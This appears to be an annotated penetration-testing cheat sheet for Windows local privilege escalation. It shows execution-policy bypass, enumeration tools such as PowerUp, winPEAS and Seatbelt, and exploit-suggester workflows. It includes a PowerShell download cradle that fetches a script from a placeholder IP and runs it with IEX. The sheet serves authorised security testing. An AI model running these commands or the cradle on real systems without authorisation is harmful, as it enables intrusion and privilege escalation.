Automated enumeration (Windows local privilege escalation). Everything below runs as the current low-privileged user on the target unless noted; most of these tools are signature-flagged by Defender/AMSI on current builds, and all of them leave artifacts (process creation, dropped files, PowerShell script-block logs), so use them only on hosts you are authorised to test.
PATH fix — restore a usable PATH when the shell you land in has an empty or broken one
# cmd syntax (PowerShell equivalent: $env:PATH = "C:\Windows;...;$env:PATH").
# Prepends the standard system directories so that tools still resolve when
# the current shell's PATH is empty or broken. This only changes the current
# process - nothing persists. Putting the system dirs FIRST also stops a
# writable directory that appears earlier in %PATH% from shadowing system
# binaries you call later.
set PATH=C:\Windows;C:\Windows\system32;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;%PATH%
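# Show the effective execution policy at every scope before touching it.
Get-ExecutionPolicy -List
# Relax the policy for THIS process only. Without -Scope, Set-ExecutionPolicy
# targets LocalMachine, which writes HKLM and therefore needs admin rights -
# exactly what you do not have yet - and it leaves a persistent registry
# change behind. Process scope needs no privilege and vanishes with the shell.
# -Force suppresses the confirmation prompt, which would hang a non-interactive
# (reverse) shell. Bypass matches the "-exec bypass" used by the one-liners
# below; execution policy is not a security boundary either way.
Set-ExecutionPolicy Bypass -Scope Process -Force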
Check OS architecture, process bitness and OS version / release ID
# Architecture: if the OS is 64-bit but this process is not, you are running
# under WOW64 - file-system and registry views are redirected (SysWOW64 /
# Wow6432Node) and 64-bit payloads will not load. Relaunch a native shell via
# C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe before exploiting.
PS> [system.environment]::Is64BitOperatingSystem
PS> [system.environment]::Is64BitProcess
# cmd: reports the CURRENT PROCESS architecture (x86 inside a WOW64 cmd);
# %PROCESSOR_ARCHITEW6432% is only set (to AMD64) when running under WOW64.
> echo %PROCESSOR_ARCHITECTURE%
# Product/version summary (PowerShell 5.1+; can be slow on some hosts).
PS > Get-ComputerInfo | select WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
# Windows 10 release ID. NOTE(review): from 20H2 onward ReleaseId is frozen at
# "2009"; read DisplayVersion from the same key for the real version (21H2 ...).
PS> (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId).ReleaseId
# Full OS name. Get-WmiObject exists only in Windows PowerShell (5.1 and
# older); on PowerShell 7 use Get-CimInstance Win32_OperatingSystem.
PS> (Get-WmiObject -class Win32_OperatingSystem).Caption
# Kernel version as Major.Minor.Build.
PS> [System.Environment]::OSVersion.Version
# PowerUp (PowerSploit) - checks for misconfigurations a standard user can
# abuse (unquoted service paths, writable service binaries/registry keys,
# AlwaysInstallElevated, stored credentials, ...).
# On Kali: /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
# Run from cmd: -exec bypass relaxes the execution policy for this process
# only; Import-Module loads the .ps1 as a script module. Expect Defender/AMSI
# to block the unmodified script on current builds. The "AbuseFunction" lines
# in its output MODIFY the host (e.g. add a local admin) - read them before
# running any.
> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks -Format List}"
[OR]
# From an existing PowerShell session: dot-source the script, then run the
# check (-Format List gives the verbose, per-finding output).
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks -Format List
# Sherlock - matches installed hotfixes against a fixed list of older
# kernel/driver CVEs. NOTE(review): the project is unmaintained (its author
# points to Watson instead), so a clean result does NOT mean the host is
# patched - cross-check with WES-NG further down.
> powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
[OR]
# Same from an existing PowerShell session.
PS> . .\Sherlock.ps1
PS> Find-AllVulns
# JAWS - enumeration script; on Kali at /opt/JAWS/jaws-enum.ps1.
# NOTE(review): the URL below fetches "jaws.ps1", so serve a renamed copy (or
# fix the URL). This pulls the script over plain HTTP and feeds it straight
# into IEX: whatever the server at IP returns executes as the current user, so
# only point it at a host you control, and expect both the cleartext transfer
# and the download-cradle pattern itself to be visible to network and
# endpoint monitoring. If cmd mangles the unquoted parentheses/quotes, wrap
# the payload in -Command "...".
> powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://IP/jaws.ps1')
# Privesc - on Kali at /opt/Privesc/privesc.ps1; the copy on the target is
# assumed to have been renamed to p.ps1 (the module name used below).
# -Groups lists the group memberships to evaluate; the remaining switches
# widen the output (exact semantics are not shown here - see
# Get-Help Invoke-Privesc).
> powershell.exe -exec bypass -Command "& {Import-Module .\p.ps1; Invoke-Privesc -Groups 'Users,Everyone,Authenticated Users' -Whoami -Extended -Long}"
# .NET 4.0+ is required by the compiled C# tools that follow (winPEAS,
# Seatbelt, SharpUp) - check before dropping them on the host.
# cmd check
# Installed runtime directories (a v4.0.30319 entry means a 4.x runtime).
> dir /b %windir%\Microsoft.NET\Framework\v*
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
# v4 details, recursive (the Release value identifies the exact 4.x version).
> reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s
# check for .NET using PS
PS> cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
# Walk the NDP key: -EA 0 (= -ErrorAction SilentlyContinue) skips subkeys
# that have no 'version' value; the regex keeps subkeys whose name starts
# with a letter other than 'S' (drops the non-version Setup/SKU-style keys).
PS> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version
# winPEAS - broad local enumeration (C# build, needs .NET 4.x; the "any"
# build runs on whichever 4.x runtime is present). It is loud: many process
# spawns and registry/file reads, and it is widely signatured by AV.
# Bracketed arguments are optional: 'quiet' drops the banner; per the winPEAS
# README, 'fast' skips the slow checks and 'cmd' enables the checks that shell
# out to cmd.exe (verify against your build's help output).
winPEASany.exe quiet [cmd fast] [flag]
# [flag] = one of the check groups below (omit it to run everything):
# systeminfo; userinfo; processinfo;
# servicesinfo; applicationsinfo; networkinfo;
# windowscreds; browserinfo; filesinfo; eventsinfo
# Seatbelt (GhostPack) - host "safety check" enumeration; needs .NET 4.x.
# Compiled binaries on Kali: /usr/share/windows-resources/Ghostpack-CompiledBinaries/
# -group=all runs every check (slow and noisy); name a single group or check
# to narrow it. -outputfile writes the report to disk ON THE TARGET: pick a
# path the current user can write, and delete it when done - the output can
# contain sensitive host data.
> .\Seatbelt.exe -group=[all | <check>] -outputfile="FULL-PATH"
# SharpUp (GhostPack) - C# port of PowerUp's privesc checks (audit only, no
# abuse functions); needs .NET 4.x. Same Kali location as Seatbelt:
# /usr/share/windows-resources/Ghostpack-CompiledBinaries/
# No arguments = run all checks.
> .\SharpUp.exe
# windows-exploit-suggester (the script name is abbreviated here; upstream
# it is windows-exploit-suggester.py). Runs on the ATTACKER machine against a
# saved 'systeminfo' dump, so nothing extra is dropped on the target.
# Needs Python 2 (EOL - keep it in a venv/container).
# copy .
# (i.e. copy the script, and later its database, into the working directory)
# FIX: newer xlrd (2.x) dropped .xlsx parsing, which the bulletin database
# file uses, so pin the last 1.x release:
# FIX: python2 -m pip install 'xlrd==1.2.0'
# --update downloads the Microsoft bulletin spreadsheet (needs internet).
# NOTE(review): that bulletin feed ended in 2017, so this database misses
# anything newer - prefer WES-NG below for current hosts.
./windows-exploit-s.py --update
# -d: the spreadsheet written by --update; -i: systeminfo output saved from
# the target; --hotfixes: a separate KB list for when systeminfo's hotfix
# section is empty or truncated (see 'wmic qfe' below).
./windows-exploit-s.py -d <DB-FILE> -i <SYSTEMINFO.txt> [--hotfixes <>]
# If systeminfo's hotfix list is empty or truncated, pull the KB list from
# WMI instead (run on the TARGET; save the KB numbers to a file for
# --hotfixes). wmic is deprecated and may be absent on recent Windows 11
# builds - use Get-HotFix in PowerShell there.
wmic qfe list full
# WES-NG - maintained successor to windows-exploit-suggester (Python 3, run
# on the attacker host). --update fetches the current definitions (needs
# internet). NOTE(review): "sys.txt" here vs "systeminfo.txt" below - both
# mean the saved systeminfo output; use one name.
python3 /opt/wesng/wes.py sys.txt --update
# --exploits-only: report only CVEs with a known public exploit; -o: CSV out.
python3 /opt/wesng/wes.py systeminfo.txt [--exploits-only] -o wes.csv
# Useful WES-NG filters to cut the list down to what matters for privesc:
# --impact | -i "Remote Code Execution" | "Elevation of Privilege"
# --severity critical